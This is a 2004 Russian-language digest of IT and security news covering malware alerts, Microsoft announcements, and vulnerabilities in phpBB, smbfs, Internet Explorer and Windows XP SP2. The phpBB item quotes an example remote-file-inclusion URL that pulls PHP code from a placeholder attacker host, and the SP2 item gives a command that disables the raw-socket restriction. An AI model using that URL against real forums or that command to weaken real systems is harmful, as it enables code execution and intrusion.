В России начались продажи книги "Искусство обмана", выпускаемой издательством "АйТи-Пресс" Академии АйТи, сообщает Internet.Ru. Автор книги – легендарный хакер Кевин Митник открывает секреты противостояния самой серьезной угрозе безопасности – человеческой природе. The Art of Deception доказывает, что все может пасть жертвой социоинженера. Книга объясняет, как просто бывает перехитрить всех защитников и обойти технологическую оборону. Сейчас Кевин Д. Митник – консультант по безопасности различных корпораций по всему миру и соучредитель консалтинговой компании Defensive Thinking ("Защитное Мышление") расположенной в Лос-Анжелесе. Кевин Д. Митник выступал в Сенате перед правительственным комитетом с докладом о необходимости разработки законодательной базы для обеспечения безопасности информационных систем правительства. Его статьи публиковались в центральных новостных и профессиональных журналах. Кевин и его соавтор, Бил Саймон, рассказывают множество историй, которые сами по себе интересны и раскрывают секреты андеграунда социальной инженерии. Каждая история комментируется авторами, которые дают практические советы по защите от атак, по обеспечению корпоративной безопасности и снижению информационной угрозы. Книгу можно заказать в Интернет-магазине "Болеро". Некоторые главы книги имеются на русском языке на сайте Дмитрия Леонова bugtruq.ru.
Страница заказа

19/11/2004 10:20 Увеличение безопасности Apache используя SELinux
Опять радует полезными ссылками opennet.ru. В статье "Understanding and Customizing the Apache HTTP SELinux Policy" описываются пути использования SELinux в Linux дистрибутиве Fedora Core, для дополнительной защиты системы от возможных проблем безопасности в apache и скриптах пользователей.
Статья

19/11/2004 10:01 Обнаружен простейший DOS-вирус Ng.695
Компания Symantec предупреждает о появлении малоопасного DOS-вируса Ng.695. Эта простейшая резидентная вредоносная программа ищет на доступных носителях и инфицирует исполняемые файлы с расширением СОМ. При этом, однако, вирус игнорирует файлы, имена которых начинаются на "СО", "SO" и "М", а также файлы, на месте четвертого символа в имени которых стоит буква "m". После запуска пораженные программы выводят на дисплей сообщение об ошибке со следующим текстом: "Bad command or file name" (неправильная команда или имя файла).
Описание

19/11/2004 09:56 Microsoft засудит пользователей Linux
Исполнительный директор Microsoft Стив Баллмер пригрозил правительствам стран Азии длинной чередой судебных исков, если те вздумают предпочесть продуктам Microsoft ПО с открытым кодом. Российским же госструктурам подобные угрозы не предъявят: именно Microsoft доверили создание системы электронного правительства нашей страны. Выступая на форуме руководителей правительств азиатских стран в Сингапуре, Стив Баллмер заявил, что создатели Linux нарушили, в общей сложности, больше 228 патентов. В детали вдаваться он не стал. «Рано или поздно во все страны, входящие в ВТО (Всемирную Торговую Организацию), придет кто-нибудь и напомнит о необходимости заплатить за пользование интеллектуальной собственностью», - указал он. В Азиатско-Тихоокеанском регионе настойчивая борьба Microsoft с конкурентом способна ввергнуть в панику многих: так, в прошлом месяце министерство обороны Сингапура перевело более 20 тыс. своих ПК на ПО с открытым кодом вместо продуктов Microsoft. Другие страны региона от Сингапура не отстают. Китай, Япония и Южная Корея в этом году договорились начать совместную разработку программного обеспечения с открытым кодом, которое работало бы под управлением операционной системы Linux. Китайское правительство занимает особенно жесткую позицию, полагая, что зависимость от продуктов Microsoft представляет собой весьма серьезную угрозу для страны. Существует опасение, что в коде Windows имеются скрытые возможности, позволяющие соответствующим службам США проникнуть в китайские компьютерные сети и вывести их из строя – например, в случае начала войны с Тайванем. Слухи о небезопасности программных продуктов Microsoft лично развеял сам Стив Балмер. «Мы полагаем, - заявил он, - что наши программные продукты намного безопаснее, чем программы с открытым кодом. Их большая безопасность основывается на том, что за ними стоим мы. Мы поправляем их, поскольку мы создали их. А о том, кто же на самом деле создал программные продукты с открытым кодом, в точности не знает никто».
CNews

19/11/2004 09:30 Билл Гейтс получает 4 миллиона писем в день, большинство из них - спам
Глава Microsoft Билл Гейтс (Bill Gates) получает около четырех миллионов электронных писем в день. Об этом в четверг сообщил исполнительный директор корпорации Стив Болмер (Steve Ballmer) в ходе выступления на Азиатско-тихоокеанском форуме по высоким технологиям в Сингапуре. Болмер пояснил, что лично Гейтс всю свою почту не читает - в корпорации имеется специальное подразделение, которое занимается фильтрацией писем, направленных главе Microsoft и самому богатому человеку в мире. Большинство писем, отметил Болмер, являются спамом. По всей видимости, Гейтс из всех пользователей Интернета получает наибольшее количество спама. Сам Болмер, второй человек в Microsoft, также получает очень много ненужных писем, однако они также подвергаются фильтрации. Как передает агентство France-Presse, Болмер заявил, что из всего спама, присылаемого на его адрес, через фильтры удается "прорваться" примерно 10 письмам такого рода в день.
Lenta.Ru

18/11/2004 19:36 Уязвимость в модуле Cash_Mod форума phpBB2
Обнаружена серьезная уязвимость в модуле Cash_Mod(всех версий) форума phpBB. Уязвимость заключается в возможности злоумышленнику выполнить произвольный PHP код. Такую возможность дает неправильное описание переменных "$phpbb_root_path" и "$phpEx" в файле "admin/admin_cash.php", значения которых может изменить любой пользователь выполнив GET или POST запрос. В итоге злоумышленник может использовать любой PHP код, полученный с удаленного сайта, указав необходимый путь при помощи упомянутых ранее параметров. Например, выполнение произвольного кода находящегося в файле "/includes/functions_cash./test.php" на веб-сервере "http://crackersite/" будет выглядеть так:
"http:/host/phpbb2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://crackersite/&phpEx=/test.php".
По приведенной ниже ссылке, вы сможете узнать о способе ликвидации этой уязвимости.
SecurityFocus BUGTRAQ

18/11/2004 17:32 Регистратора домена отныне можно менять
Организация ICANN ввела в действие новую политикиу передачи доменных между регистраторами. Отныне владельцы доменных имен смогут выбирать регистратора по своему усмотрению подобно тому, как в случае наличия соответствующих соглашений можно сохранять номер мобильного телефона при смене оператора. Идея в том, чтобы пользователи смогли выбирать оптимальные для себя ассортимент услуг и цены, способствуя тем самым конкурентной борьбе между регистраторами. В ICANN также сообщают, что приняли меры по защите от несанкционированной передачи доменных имен: при передаче регистратор обязан удостоверить личность владельца имени и перед внесением любых изменений должен использовать утвержденную процедуру авторизации, обеспечивающую получение согласия индивидуума или организации. Регламентирован также процесс разрешения диспутов между регистраторами, могущих возникнуть в ходе выполнения запросов на передачу домена. Дополнительно введена услуга Redemption Grace Period Service - 30-дневный период, в течение которого держатель доменного имени может потребовать его назад в случае непреднамеренного удаления из базы данных регистратора.
"Открытые системы"

18/11/2004 17:09 DVD-версия FreeBSD 5.3 выложена на FTP
На ftp.linuxcenter.ru выложен дистрибутив FreeBSD 5.3 на 2DVD, собранный командой ЛинуксЦентра, сообщает linux.org.ru. В этот набор включены все пакеты с официального FTP-сервера FreeBSD.org, сопроводительная документация на русском языке (каталог russian), а также полный CVS репозиторий FreeBSD (ncvs.tgz) от 11 ноября 2004 года. Содержимое дисков: DVD#1 - Install DVD + пакеты + сопроводительная документация на релиз. DVD#2 - Live FileSystem FixIT DVD + пакеты + CVS репозиторий проекта FreeBSD от 11 ноября 2004 года.
Скачать

18/11/2004 16:55 Обновление IE возможно, утверждает Microsoft
Microsoft, которую призывают добавить в Internet Explorer новые функции, говорит, что это можно делать через имеющийся в браузере механизм подключения дополнительных модулей. Компания неуклонно стояла на том, что она не станет выпускать новую самостоятельную версию IE, последнее обновление которой состоялось в августе 2001 года. Испытав ряд кризисов с безопасностью IE, Microsoft выпустила серьезный апгрейд вместе с Windows XP Service Pack 2. Но он доступен только пользователям Windows ХР — то есть примерно половине мира Windows. Microsoft утверждала, что она слишком занята работой над многострадальной операционной системой Longhorn, чтобы возвращаться к разработке браузера. Теперь же компания говорит, что способность браузера к наращиванию позволяет добавлять в IE функции, которые заказчики считают «сверхвысокоприоритетными». «Это способ для Microsoft наращивать IE, — сказал директор Microsoft по управлению продуктами Windows Гари Скейр. — В центре нашего внимания находится Longhorn, и ко всему, что от него отвлекает, мы относимся с большой осторожностью. Надо сказать, что механизм наращивания очень надежный, и разрабатывать модули для него чрезвычайно легко. Это путь, хотя мы и не планировали это делать». Скейр, который уже говорил о возможности наращивания IE (об этом сообщалось в Microsoft Watch), отметил, однако, что не любые функции можно добавить к IE в виде дополнений. Например, с функцией Tabbed browsing это не пройдет. На сайте Windows Marketplace компании недавно открылся раздел, посвященный дополнениям для IE. Среди них только один — MSN Toolbar — является продуктом Microsoft, хотя в списке есть и устаревший уже Service Pack 1. Скейр сказал, что новый сайт дополнений живет активной жизнью, и с момента его открытия предложено уже около тысячи модулей для IE.
Подробности

18/11/2004 16:15 Обзор ОС OpenBSD 3.6
29 октября команда разработчиков проекта OpenBSD, в лице Theo de Raadt, объявила о выходе новой версии это ОС - 3.6, в которой добавлена дополнительная поддержка нового железа, включена поддержка многопроцессорности (SMP) для платформ i386 и amd. Также включено около 200 новых приложений в дерево портов. На сайте NewsForge Jem Matzan опубликовал краткий обзор OpenBSD 3.6.
Обзор

18/11/2004 15:24 Новая модификация трояна Banker
"Лаборатория Касперского" сообщает об обнаружении новой модификации вредоносной программы Banker, предназначенной для кражи конфиденциальной информации о пользователях интернета, например, банковских счетов или номеров кредитных карт. После запуска троян Banker.U, занимающий в распакованном виде около 75 кб, создает в системном каталоге Windows два файла с расширениями DLL и ЕХЕ, вносит ряд изменений в реестр и затем открывает "черный ход" в систему. Кроме того, вредоносная программа сканирует все доступные сетевые и интернет-ресурсы, собирая информацию финансового характера. Похищенные данные впоследствии отправляются на веб-сайт, адрес которого прописан в коде трояна.
Описание

18/11/2004 13:21 Trend Micro представила новые антивирусы
Компания Trend Micro, разработчик антивирусного ПО, объявила о расширении семейства приложений Trend Micro Network VirusWall для предотвращения эпидемий сетевых червей и представила продукты Network VirusWall 2500 и Network VirusWall 300. Network VirusWall 2500 является надстройкой к Network VirusWall 1200 и позволяет управлять безопасностью комплекса сетевых сегментов и серверов через единое устройство. Поддержка Gigabit Ethernet обеспечивает менеджеров по безопасности необходимыми возможностями по защите современных широкополосных сетевых инфраструктур. Network VirusWall 300 предназначен для обеспечения безопасности устройств с непрерывным доступом к данным, таких как банкоматы и терминалы самообслуживания. Блокируя несанкционированный доступ к подобным устройствам, Network VirusWall 300 создает двусторонний барьер, который не дает пользовательским терминалам стать источником инфекции для внутренних и внешних сетей, к которым они подсоединены. Trend Micro также выпустила новую версию вирус-сканера HouseCall. Вирус-сканер позволяет осуществлять тестирование зараженности компьютера вирусами, интернет-червями и контролировать безопасность системы. Новая версия HouseCall, построенная на Java, предлагается бесплатно для работы на популярных операционных системах и браузерах.
Подробности

18/11/2004 11:45 AOL возобновляет работу над браузером Netscape
Компания AOL решила возобновить разработку популярного некогда интернет-браузера Netscape. Как сообщает интернет-издание BetaNews, концептуально за основу нового варианта Netscape будет взят браузер Firefox, который, как и предыдущие версии Netscape, основан на ядре Mozilla. Ядро и первичный интерфейс были изначально созданы группой разработчиков во главе с Марком Андрессеном (Marc Andreessen), которые образовали компанию Netscape Communications, вошедшую затем в состав AOL. Впоследствии на базе сайта браузера Netscape.com был создан медиапортал, который стал работать в рамках холдинга AOL Time Warner. Последнее на настоящий момент обновление Netscape имеет индекс 7.2 и произошло оно в августе этого года. Перед этим версия c индексом 7.0 выходила в августе 2002 года. В последнее время работа над проектом почти не велась, так как он окончательно потерял позиции на рынке, а у AOL начались финансовые проблемы. Издавались лишь "заплатки", исправлявшие уязвимости в системе безопасности. Тем не менее, в последнее время MSIE начал терять рынок с появлением новых, более удобных продуктов, среди которых на настоящий момент лидером стал бесплатный Firefox группы Mozilla Foundation. AOL обещает представить первый релиз предварительной версии нового Netscape 30 ноября. Вместе с тем, ранее AOL уже объявляла о работах над другим собственным браузером под названием AOL Browser. Предполагалось, что он станет "надстройкой" над ядром MSIE, добавив к нему свои функции. О том, что будет происходить с AOL Browser после возобновления работ над Netscape, не поясняется.
Lenta.Ru

18/11/2004 11:34 Уязвимости в smbfs
Как сообшает Stefan Esser из немецкой компании e-matters, в процессе изучения реализации файловой системы smbfs в ядре Linux были обнаружены уязвимости, позволяющие удалённому атакующему либо вызвать DoS, либо выполнить произвольный код в адресном пространстве ядра. Файловая система smbfs применяется для обеспечения взаимодействия с серерами SAMBA, предоставляющими ресурсы Linux-серверов в распоряжение машин под управлением ОС Windows (с использованием протокола NetBIOS, в терминах Microsoft вышеозначенная файловая система носит название CIFS и опичана вместе с проколом в RFC 1001,1002). Уязвимости связаны с ошибками при обработке функций smb_proc_read() и smb_receive_trans2. Существует, правда достаточно существенное ограничение на область применения атаки. Первое связано с тем, что ни один нормальный системный администратор не выставит наружу SAMBA-сервер. Второе связано с тем, что атакующий должен иметь возможность контролировать соединение между SAMBA-сервером и клиентом, чтобы перхватывать и преобразовывать ответы сервера к клиенту (уязвимость связана с некорректной обработкой специальным образом сформированных SMB-ответов), что предполагает атаку типа MITM (man in the middle - вклинивание атакующего в существующее соединение). Как пишет сам автор, в планы e-matters не входит опубликование эксплоита для широкой общественности. Уязвимости подвержены ядра 2.4 (до 2.4.27 включительно) и 2.6 (до 2.6.9). Патчи для обоих ветвей ядра были предоставлены разработчикам и включены в 2.4.28-rc3 (соответственно, и в вышедшее ядро 2.4.28).
Подробное описание

18/11/2004 10:51 Microsoft включает поддержку FireWire
Компания официально подтвердила свое намерение добавить FireWire (IEEE-1394) в список поддерживаемых стандартов. Пока, как пишет Reuters, речь идет только о внесении необходимых дополнений в программу обработки и монтажа цифрового видео Microsoft MovieMaker 2, благодаря чему воспользоваться программой смогут и владельцы цифровых видеокамер с FireWire-интерфейсом. В отличие от своего главного конкурента – разработанного Intel стандарта USB 2.0 – интерфейс FireWire, успешно применяемый в большинстве продуктов Apple, позволяет управлять цифровой камерой прямо с рабочего стола, избавляя пользователя от приобретения специальных монтажных пультов. Ожидается, что полноценная поддержка FireWire будет добавлена после выхода очередного сервис-пака для Windows XP.
Internet.Ru

18/11/2004 10:38 Хакеры все чаще объединяются в ОПГ
Согласно последнему отчету VeriSign, все больше сетевых атак совершается не хакерами-одиночками, а организованными преступными группировками. Кроме того, качественный уровень атак с каждым годом повышается. Основной целью преступных групп становятся компьютеры обычных интернетчиков. Если ваш компьютер подключен к интернету — вы потенциальная мишень для их атаки, передает News.Com. Атаки преследуют конкретную цель — заработать денег. Для достижения этой цели преступники устраивают DDoS-атаки на сайты компаний, парализуя их деятельность, воруют номера кредитных карт со взломанных компьютеров, продают рекламу в спам-рассылках или торгуют собственными базами данных адресов электропочты. Данные исследования базируются на информации, предоставленной компаниями, владеющими онлайн-сервисами, также были изучен мониторинг доступности сайтов, статистика кражи номеров кредитных карт и обобщенные данные по корпоративной безопасности. Анализ показал, что большинство компьютеров в Америке, подключенных к интернету по широкому каналу, используются преступниками для хакерских атак. Число инцидентов, связанных со взломом компьютеров, увеличилось за год на 150%. Как сообщают исследователи, к сожалению, выявить злоумышленника практически не возможно. Вычислить компьютер, с которого производится атака — вполне реально. Однако за ним сидит обыкновенный интернетчик, который даже не подозревает, что его компьютер тайно используется для злодеяний. По данным VeriSign, которые основываются на анализе почтового трафика клиентов компании, доля спама в сообщениях электропочты достигла 80%. Однако, есть и позитивный момент — средний размер спам-письма меньше, чем средний размер «обычного» письма. В связи с этим доля спама в почтовом трафике составляет только 21%.
"Вебпланета"

18/11/2004 10:10 Выход ядра Linux 2.4.28
После выхода RC4 объявлено о выходе окончательной версии ядра Linux 2.4.28, ветви, развиваемой параллельно с новой ветвью 2.6. После версии RC3, версия устраняет лишь незначительные баги, никаких изменений в части секьюрити. Фактически, промежуток от предыдущей версии (2.4.27) был заполнен лишь тремя RC и тремя пререлизами (-pre1, ...-pre4).
СhangeLog

18/11/2004 09:28 Microsoft перевыпустила патч для ISA
Корпорация Microsoft перевыпустила «заплату» для сервера Internet Security and Acceleration (ISA) после пересмотра её кода. В первый раз патч для ISA Server 2000 и Proxy Server 2.0 был выпущен 9 ноября. Пользователи Microsoft Small Business Server 2003 Premium Edition и Small Business Server 2000 могут также загрузить «заплату», так как в данном ПО содержится код ISA. Исправленная уязвимость позволяет хакерам маскировать вредоносный код. Представители Microsoft предупреждали, что с её помощью можно создавать безопасные на вид веб-страницы со встроенными хакерскими программами. Также эксперты корпорации рекомендуют очистить DNS-кэш системы, так как в нем могут содержаться зараженные данные.
CNews

18/11/2004 09:02 Накатывает новая волна RISC-вычислений
Несмотря на всё то, что было писано (и переписано) о потенциальном устаревании платформ на процессорах RISC, они все работают и работают. Между тем сегодня RISC-процессоры как никогда важны для продолжения инноваций в области проектирования компьютеров. Новаторство при конструировании зависит не от экономики больших объемов, концепций производителей микропроцессоров или планов компьютерных компаний. Инновационные конструкции появляются там, где есть опыт выращивания комплексных систем с нуля — от микросхемы до системной платы и кода. Такие компании тесно сотрудничают с конечными пользователями, чтобы узнавать о новых требованиях, и для создания самых передовых систем, отвечающих этим требованиям, используют технологию RISC. В 1980-ые технология RISC (reduced instruction set computing) изменила правила игры в вычислительной технике. Предшественниками RISC были первые процессоры CISC (complex instruction set computing), использовавшие всего около 20% реализованных в них инструкций. RISC-процессорам требуется гораздо меньше инструкций, что делает их более дешевыми в производстве. Спустя почти десятилетие после появления первых коммерческих RISC-процессоров производители CISC-процессоров начали применять принципы конструкции RISC в своих продуктах. Сегодня такие CISC-процессоры, как Pentium 4 и Opteron, преобразуют сложные инструкции в последовательность простых RISC-подобных команд, а затем опираются на мощный RISC-подобный мотор «под капотом» для исполнения получившихся «микроинструкций». Аналогично, спустя примерно десятилетие после того, как RISC-процессоры продемонстрировали 64-разрядную обработку, появились первые процессоры с 64-разрядной архитектурой х86. Теперь перед компьютерной индустрией стоит новый комплекс проблем. Процесс повышения тактовой частоты резко замедлился. Время доступа к памяти увеличилось с нескольких тактовых циклов до сотен тактов. Потребляемая мощность и связанные с этим проблемы тепловыделения быстро выходят из под контроля. Короче, пришла пора конструкторам RISC снова указать путь в новую эру вычислительной техники.
ZDNet

17/11/2004 19:50 Возможность обхода "защиты" Windows XP SP2
Как известно, второй сервис-пак для ОС Windows XP (он же SP2) позиционировался Microsoft, как некий кардинальный инструмент для значительного повышения безопасности этой операционной системы, уязвимости в которой в крайнее время обнаруживались довольно часто (если не сказать больше). Одной из подобных мер защиты, накладываемой на систему после установки SP2 является запрет работы с так называемыми "сырыми" (raw) сокетами. К подобным сетевым пакетам можно отнести как пакеты, формируемыми различными сканерами (например, знаменитым nmap), так и пакеты, в которых в качестве исходного IP-адреса указывался адрес, отличный от системы, с которой он посылался (spoofed IP). Cама M$ сообщала, что подобная особенность позволит ""limit the ability of malicious code to create distributed denial-of-service attacks and limit the ability to send spoofed packets" (см. http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2netwk.mspx#EHAA). Разумеется, подобная "особенность" причиняет некоторые неудобства при работе с некоторыми программами. Однако, как заметили Juergen Schmidt и Holger Lembke, эту защиту можно довольно легко отключить, выдав простую команду: net stop SharedAccess. Об этом было сообщено Microsoft, которая ответила, что это не является уязвимостью в системе безопасности, однако, тем не менее, меры для предотвращения отключения подобной защиты будут приняты.
Подробности

17/11/2004 19:24 Уязвимости в Internet Explorer
О наличии уязвимостей в Internet Explorer сообщает некто cyber flash. Согласно сообщению автора, наличие этих уязвимостей может позволить обойти ограничения, накладываемые в систему безопасности системы SP2 и привести к обману пользователя, что, в конечном итоге позволит загрузить вредоносные файлы. Первая уязвимость связана с возможностью формирования специального "Content-Location" HTTP-заголовка в загружаемом файле, который позволяет обойти ограничение SP2, связанное с выдачей предупреждения пользователю при открытии файлов определённого типа. В результате файл будет загружен без всякого предупреждающего сообщения. Вторая уязвимость связана с ошибкой, возникающей при сохранении некторых документов с использованием функции Javascript "execCommand()". В результате может быть скрыто настоящее расширение файла в диалоге "Save HTML Document". Успешная эксплуатация уязвимости требует включения опции "Hide extension for known file types" (по умолчанию включена). Комбинация обоих уязвимостей позволяет загрузить на компьютер счастливого пользователя браузера IE в "сами_знаете_какой_ОС" под видом HTML-документа вредоносного исполняемого файла. Наличие уязвимости протестировано на полнопатченной системе с IE6. В качестве меры противодействия до выпуска патча рекомендуется отключить Active Scripting и "Hide extension for known file types".
Подробности

17/11/2004 17:32 Дыра в Windows остаётся открытой 107 дней!
В то время, как Билл Гейтс делает различные пророчества в стиле Нострадамуса и рассказывает о перспективах развития современных операционных систем в ныне работающих ОС остаются незалатанными очень серьёзные уязвимости. Так, известная компания eEye Digital Security уже 107 дней назад (2 августа) поставила M$ в известность о существовании очень серьёзной уязвимости в ОС Windows 2000. Наличие этой уязвимости позволяет удалённому атакующему получить полный контроль над системой (при этом никакой авторизации не требуется)! Единственное, что обнадёживает, это то, что речь, судя по всему идёт об инсталляции по умолчанию (default), так что остаётся надежда на опытность системных администраторов. Как ни странно, несмотря на собственную политику (оставлять разработчику 2 месячный срок для выпуска патча перед опубликованием подробной информации) eEye пока не раскрывает деталей уязвимости. Кроме того, позавчера eEye был отправлен отчёт об ещё одной уязвимости, присутствующей на сей раз в нескольких ОС - сообщается об Win ME/XP/2K/2003, наличие которой позволяет при минимальном вмешательстве удалённого злоумышленника выполнить произвольный код в системе. Детали всё также не разглашаются. А в это время в Копенгагене... на IT-форуме... Разумеется, легче делать прогнозы и анонсировать новые методы аутентификации, чем заниматься нудным делом укрепления безопасности существующих ОС.
Подробности

17/11/2004 16:51 Билл Гейтс: пароль мертв
Смарт-карты и 64-разрядные вычисления – вот будущее ИТ, утверждает председатель совета директоров Microsoft Билл Гейтс, а паролям там места нет. Выступая сегодня на ежегодном ИТ-форуме Microsoft в Копенгагене, легендарный основатель Microsoft официально объявил о том, что пароль мертв, а будущее делового мира - за смарт-картами. Гейтс назвал технологии управления идентификацией (так называемый identity management) «значительным источником запутанности ИТ», добавив, что одна из крупнейших проблем в области информационной безопасности, с которой сталкиваются современные пользователи — так называемый фишинг — не возникла бы вообще, если бы системы были изначально правильно сконфигурированы. «Существует множество случаев, когда люди пытаются взломать системы идентификации. Если бы они были правильно установлены, мы могли бы определить, каким сайтам вы хотите передать информацию, и свести на нет усилия мошенников, занимающихся фишингом», — отметил он. Билл Гейтс также заявил, что пароли как средства обеспечения инфобезопасности обречены на вымирание. «Еще один важный вопрос в области систем идентификации — ненадежность паролей, — говорит он. — Мы не собираемся рассчитывать на их надежность». Что же заменит пароли? По мнению Билла Гейтса, это цифровые средства идентификации, основанные на радиометках и биометрии. «Мы движемся по направлению к биометрии и смарт-картам, — говорит глава софтверного гиганта. — Мы наконец видим, что наши ведущие клиенты начинают предпринимать шаги в этом направлении». Microsoft собирается использовать смарт-карты в своих офисах, а также планирует в сотрудничестве с Axalto создать смарт-карту на платформе Microsoft .Net. «Microsoft будет использовать смарт-карты внутри компании — каждый сотрудник с помощью одной лишь карты сможет входить и выходить из здания и получать доступ к своей машине… они полностью заменят пароли, даже внутри компании», — говорит Билл Гейтс.
CNews

17/11/2004 16:39 «Тефлоновый» вирус неуязвим для антивирусов
В Сети появилось новое семейство вирусов, обладающее повышенной устойчивостью к традиционным антивирусным программам и способное без труда проникать сквозь все существующие барьеры. Как сообщила компания Cearswift, специализирующаяся на обеспечении компьютерной безопасности, новый вирус является «дальним родственником» вируса MyDoom и использует уязвимость «переполнение буфера» браузера Internet Explorer компании Microsoft. Для своего распространения вирус реализует принципиально новую, скользкую, подобно тефлону, стратегию, значительно затрудняющую его обнаружение и борьбу с ним. В отличие от обычных вирусов, Bofra не содержит в себе ничего «криминального» - например, вложений или какого-либо вредоносного скрипта, написанного на HTML. Единственное, что имеется в вирусе – это ссылка, ведущая на инфицированную машину, на которой вирус уже инсталлировал небольшой веб-сервер. При переходе по ссылке на машину пользователя загружается собственно вредоносная программа. Затем она рассылает аналогичные сообщения по адресам, обнаруженным на машине. Пользователям, в частности, предлагается посетить порносайт с веб-камерами, либо он получает сообщение, «подтверждающее» покупку им кредитной карты. По мнению специалистов Clearswift, подобная технология, заключающаяся в создании многочисленных веб-серверов, обеспечивает чрезвычайно быстрое распространение вируса и крайне осложняет борьбу с ним. «Раньше авторы вирусов указывали в рассылаемых пользователям Сети письмах ссылки, ведущие на находящиеся под их управлением сервера, однако они имели статический IP-адрес, - указывается в сообщении Clearswift, - и их было сравнительно нетрудно блокировать. Теперь злоумышленникам удалось обойти проблему. В новом черве используются динамические адреса, что чрезвычайно осложняет борьбу с ними».
Подробнее о вирусе

17/11/2004 16:15 Планируется выпуск PC Anywhere for Linux
Компания Symantec в начале декабря собирается выпустить новую версию pcAnywhere за номером 11.5, которая умеет работать с Linux, сообщает linux.org.ru. Программа работает на Red Hat Linux and Novell SUSE Linux. Графический интерфейс инструмента удаленного управления адаптирован для KDE и GNOME.
Подробности

17/11/2004 16:13 Computer Associates выпустила антишпионское ПО
Компания Computer Associates выпустила программу eTrust PestPatrol Anti-Spyware r5 для обнаружения и удаления шпионских, рекламных, троянских и прочих вредоносных программ, сообщает "Компьюлента". Новый продукт предназначен для защиты корпоративных сетей небольших, средних и крупных компаний. eTrust PestPatrol Anti-Spyware r5 входит в линейку антивирусных программ для управления безопасностью CA eTrust Security Management. Преимуществом новой антишпионской программы является то, что проверка загружаемых файлов, просматриваемых веб-страниц и входящей и исходящей электронной почты происходит незаметно для пользователя. eTrust PestPatrol Anti-Spyware r5 позволяет сетевым администраторам управлять защитой корпоративных сетей как локально, так и удаленно.
О программе

17/11/2004 16:01 Чешский вирусописатель займется созданием антивирусов
Чешская компания Zoner Software, занимающаяся разработкой графических и мультимедийных программ, приняла на работу бывшего вирусописателя. 22-летнему члену группы вирусописателей 29A по имени Бенни поручено заниматься разработкой антивирусного и антихакерского программного обеспечения для интернет-подразделения Zoner Software, сообщает сайт Security Focus. Бенни стал главным разработчиком антивируса Zoner (ZAV). Несмотря на то, что этот продукт пока не предлагается конечным пользователям, назначение бывшего вирусописателя многие все равно расценивают как провокационное. Антивирусная индустрия в основном старается дистанцироваться от авторов вирусов. Таким образом разработчики дают злоумышленникам понять, что их навыки не помогут становлению карьеры в компьютерной индустрии. "Это парадоксально, но деятельность Бенни, в том числе в области написания вирусов стала хорошим доказательством того, что он понимает схему работы вирусных атак. Создатели вирусов часто подчеркивают, что подход к созданию защиты в том или ином продукте оказывается примитивным. Мы уверены, что о разработках Бенни такого сказать будет нельзя", - заявил представитель Zoner Software Эрик Пипер (Erik Piper). Бенни в течение пяти лет занимался созданием незаконных компьютерных программ. Кульминацией его увлечений стало членство в группе 29А с нетрадиционной для вирусописателей концепцией. Члены 29А выступают против массовой рассылки вредоносных программ. Одной из главных "заслуг" Бенни стало создание вируса для ОС Windows 2000 за две недели до ее релиза. По словам Бенни, он никогда не распространял созданные им вирусы.
Viruslist

17/11/2004 15:49 Гейтс анонсирует новый инструмент установки обновлений Windows
Во вторник Билл Гейтс рассказал о планах Microsoft по выпуску программного обеспечения системного управления и анонсировал долгожданный инструмент обновления Windows. Выступив на конференции IT Forum в Копенгагене (Дания), основатель Microsoft заявил, что его компания намерена снизить стоимость управления корпоративными вычислительными центрами, выступив с инициативой Dynamic Systems Initiative (DSI). Ожидается, что в IT Forum, крупнейшей европейской конференции Microsoft, примут участие около 4000 ИТ-менеджеров. Microsoft анонсировала также обновления продуктов, относящихся к системному управлению, в том числе первую публичную опытную версию службы автоматического обновления Windows. DSI — это многоуровневый план, направленный на повышение производительности труда системных операторов, наблюдающих за сетями компании. Получив лучшие инструменты управления, администраторы смогут быстрее справляться с большим количеством таких задач, как установка исправлений на серверы. Совершенствование системного администрирования стало задачей первостепенной важности для отделения корпоративного ПО Microsoft. Руководители компании отмечают, что большая часть затрат на ИТ связана с эксплуатацией существующих систем, а не созданием новых бизнес-приложений. На рынке системного управления Microsoft конкурирует с IBM, Hewlett-Packard и другими компаниями. Первые плоды инициативы DSI появятся в будущем году с выпуском Visual Studio 2005, флагманского инструментария программирования Microsoft. Предполагается, что с его помощью разработчики начнут создавать приложения, меньше подверженные сбоям и проблемам производительности.
Подробности

17/11/2004 15:36 МИД РФ считает, что Интернет должен контролироваться государством
Министр иностранных дел России Сергей Лавров считает, что государственное регулирование должно распространяться и на сеть Интернет, передает ИТАР-ТАСС. Об этом он заявил во вторник на встрече с журналистами в Москве. Министр заметил, что многие страницы "всемирной паутины" пропагандируют нетерпимость и насилие. Одним их ярких примеров этому служит, по его словам, сайт чеченских сепаратистов "Кавказ-центр", получивший недавно хостинг в Швеции. Глава МИД заявил, что Москву не устраивает продолжающееся функционирование этого интернет-ресурса. Лавров считает, что создание подобных сайтов является ни чем иным, как "подстрекательством к террористической деятельности". Во вторник министр образования Андрей Фурсенко также высказался в пользу государственного контроля над применением Интернета. Правда, Фурсенко, выступая на Всемирном научном форуме в Японии, говорил не о проблемах пропаганды терроризма, а о чрезмерном увлечении людей виртуальном миром. По его мнению, это может привести к возникновению серьезных социальных проблем.
ИТАР-ТАСС

16/11/2004 17:30 Из-за чего люди теряют важную информацию
Компания Ontrack Data Recovery, занимающиеся восстановлением данных с поврежденных носителей, на своем сайте опубликовала некоторый топ происшествий, которые стали причиной обращения людей за помощью в их компанию.
1 место занял мужчина, который умудрился заморозить свой неисправный жесткий диск в морозильной камере холодильника. Свое поведение потерпевший объясняет тем, что соответствующий совет он нашел на одном из веб-сайтов в Интернете.
2 место занял владелец ноутбука, который жаловался на сбои в работе лэптопа и появление ошибок системы, приводящих к "синему экрану смерти". Оказалось, что за это был ответственен его племянник, который, в прямом смысле слова, избил ноутбук за чрезмерную задумчивость.
3 место принадлежит альпинисту, чья цифровая камера разбилась при падении с высоты около 5700 метров, к сожалению, последние моменты жизни камеры так и не удалось восстановить.
4 место занял медицинский работник, которому пришлось заново вбивать информацию о 1200 клиентах только потому, что в трансформаторную будку учреждения ударила молния.
5 место отвоевала семейная пара, забывшая сохранить сотни фотографий своего трехмесячного младенца перед переустановкой операционной системы.
6 место заняли строители, которые лишились портативного компьютера после падения на него металлической балки. К огромному их сожалению, в этом компьютере находились чертежи, возводимого ими здания.
7 место занял человек, который за нестабильную работу своего компьютера решил смыть его в унитаз. Кинув ноутбук в унитаз, он попытался его смыть, нажав несколько раз на спуск воды. После неудавшихся попыток познакомить ноутбук с прелестями канализации, владелец компьютера успокоился, достал ноутбук и принялся искать сервисы по восстановлению нужной ему информации с этого ноутбука.
